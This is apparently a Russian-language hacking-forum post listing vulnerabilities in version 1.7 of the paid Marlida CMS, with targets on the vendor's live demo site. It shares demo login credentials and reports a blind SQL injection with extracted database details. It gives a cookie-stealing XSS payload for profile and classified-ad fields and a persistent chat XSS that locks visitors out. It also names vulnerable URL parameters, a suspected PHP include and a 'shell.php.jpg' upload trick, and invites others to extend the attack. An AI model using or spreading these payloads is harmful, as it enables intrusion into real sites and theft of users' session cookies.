Marlida CMS платная (исходников нет) Данная версия: ver.1.7 ________________________________________________ ОФФ САЙТ: http://www.marlida.com/ ЛОГИН/ПАРОЛЬ ДЛЯ ВХОДА (Demo) username: dexter password: qdbgtinx SQL INJECTION Крутим как слепую Code: [SIZE=2]version: 4.0.25-Max-log db: d001f56f user: d001f56f@localhost[/SIZE] АКТИВНАЯ XSS В ЧАТЕ По адрессу http://demo.marlida.com/chat-alle (нужна авторизация) кто туда теперь зайдет уже нечего там несможнт отписать постоянно вылетает xss.. так что капкан. В ПРФИЛЕ Hobbies: "><script>alert(document.cookie)</script> Beliebiges Feld: ТУТ XSS Noch ein Feld: ТУТ XSS + "Marktplatz" выбераем "Kleinanzeigen" или "Immobilien" потом "Neus Inserat augeben" Artikelbeschreibung: ТУТ XSS ПАССИВНАЯ XSS Подозрение на php-include Code: [SIZE=1]http://demo.marlida.com/box.php?iframe=[INCLUDE][/SIZE] Пути: Code: [SIZE=2]http://demo.marlida.com/box.php?box=login&d[]=fotos&s=65&u[]=edit http://demo.marlida.com/index.php?d[]= http://demo.marlida.com/index.php?d=jobs&s=list&q=&kat=&ort= ПРОБЕЛ &ortdis=10&alter=[/SIZE] Кто доработает все буду тока рад. з.ы шелл заливается таким файлом "shell.php.jpg" ток толка нету от картинки так что можно забить.. http://demo.marlida.com/box.php?iframe=hotornot&u=neu
